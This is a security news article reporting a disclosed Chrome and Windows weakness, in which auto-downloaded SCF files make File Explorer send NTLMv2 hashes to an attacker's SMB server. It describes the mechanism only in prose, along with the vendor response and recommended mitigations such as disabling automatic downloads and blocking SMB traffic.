Attackers can use Google’s Chrome browser to install and automatically run a malicious file on a Windows PC to steal passwords.
DefenseCode security researcher Bosko Stankovic has detailed a credential theft attack on Windows that works by tricking a Chrome user into downloading a Windows Explorer Shell Command File or SCF (.scf), a format that’s been used since Windows 98 as a Show Desktop icon shortcut.
The SCF file can be used to trick Windows into an authentication attempt to an attacker-controlled remote SMB server, which is designed to capture the victim’s user Microsoft LAN Manager (NTLMv2) password hash.
The hash can then be cracked offline or used to impersonate the victim on a service, such as Microsoft Exchange, that accepts the same kind of NTLM-based authentication.
The problem affects the latest Chrome running on the latest version of Windows 10.
“Currently, the attacker just needs to entice the victim, using fully updated Google Chrome and Windows, to visit his website to be able to proceed and reuse victim’s authentication credentials,” writes Stankovic.
“Even if the victim is not a privileged user, for example, an administrator, such a vulnerability could pose a significant threat to large organizations, as it enables the attacker to impersonate members of the organization.”
The attack relies on the way Chrome and Windows treat SCF files. The specific problem with Chrome is that it does not sanitize SCF files as it does with LNK files, which are given a .download extension. Chrome started sanitizing LNK files after the discovery that government hackers were abusing LNK files to infect Windows machines with Stuxnet.
Google told Kaspersky’s ThreatPost it is addressing this problem in Chrome. This affects Chrome for all versions of Windows, including Windows 10.
A second issue with Chrome is that it relies on Windows default behavior once the SCF file has been downloaded. As Stanovic points out, Chrome automatically downloads files that it deems safe.
This approach might be fine if the user needs to manually run the file, but in Windows the SCF file will trigger a request to authenticate to the attacker’s SMB server as soon as the download directory is opened in Windows File Explorer.
“There is no need to click or open the downloaded file — Windows File Explorer will automatically try to retrieve the ‘icon’,” notes Stankovic.
His tests of “several leading antivirus” found that none flagged the downloaded SCF files as dangerous.
“SCF file analysis would be easy to implement as it only requires inspection of the IconFile parameter considering there are no legitimate uses of SCF with remote icon locations,” he writes.
Chrome users can protect themselves by disabling automatic downloads. This can be done in Settings, and selecting Show advanced settings, followed by checking the option to ‘Ask where to save each file before downloading’.
This step should significantly reduce the risk of NTLMv2 credential theft attacks using SCF files, according to Stankovic.
He also recommends restricting SMB traffic to private networks, and configuring the firewall block ports that can be used to connect with a malicious internet-based SMB server.